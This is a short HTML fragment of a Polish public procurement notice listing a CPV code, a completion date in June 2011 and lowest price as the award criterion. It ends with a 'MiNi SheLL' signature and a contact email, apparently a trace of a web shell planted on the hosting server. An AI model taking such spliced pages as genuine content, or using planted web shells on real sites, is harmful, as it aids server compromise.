<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com